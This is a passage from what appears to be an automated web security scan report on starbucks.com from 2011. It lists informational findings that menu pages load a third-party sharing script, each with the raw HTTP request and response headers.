Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:56 GMT
Connection: close
Content-Length: 42225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.172. http://www.starbucks.com/menu/drinks/tazo-tea/passion  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/passion

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/passion HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:01 GMT
Connection: close
Content-Length: 42130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.173. http://www.starbucks.com/menu/drinks/tazo-tea/refresh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/refresh

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/refresh HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:00 GMT
Connection: close
Content-Length: 42165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.174. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:00 GMT
Connection: close
Content-Length: 42106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.175. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:18 GMT
Connection: close
Content-Length: 41917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.176. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:21 GMT
Connection: close
Content-Length: 42049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.177. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:22 GMT
Connection: close
Content-Length: 41971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.178. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:24 GMT
Connection: close
Content-Length: 42146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.179. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:41 GMT
Connection: close
Content-Length: 41931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.180. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/vanilla-roobios-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/vanilla-roobios-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:51 GMT
Connection: close
Content-Length: 42328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.181. http://www.starbucks.com/menu/drinks/tazo-tea/zen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/zen

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/zen HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:55 GMT
Connection: close
Content-Length: 41944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.182. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:14 GMT
Connection: close
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.183. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:23 GMT
Connection: close
Content-Length: 40848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.184. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:21 GMT
Connection: close
Content-Length: 41344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.185. http://www.starbucks.com/menu/food  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:48 GMT
Connection: close
Content-Length: 59118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.186. http://www.starbucks.com/menu/food/bakery/8-grain-roll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/8-grain-roll

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/8-grain-roll HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:35 GMT
Connection: close
Content-Length: 44024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.187. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-bran-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/apple-bran-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:42 GMT
Connection: close
Content-Length: 44209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.188. http://www.starbucks.com/menu/food/bakery/apple-fritter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-fritter

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/apple-fritter HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:54 GMT
Connection: close
Content-Length: 44345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.189. http://www.starbucks.com/menu/food/bakery/asiago-bagel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/asiago-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/asiago-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:12 GMT
Connection: close
Content-Length: 43943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.190. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/banana-nut-loaf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/banana-nut-loaf HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:19 GMT
Connection: close
Content-Length: 42482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

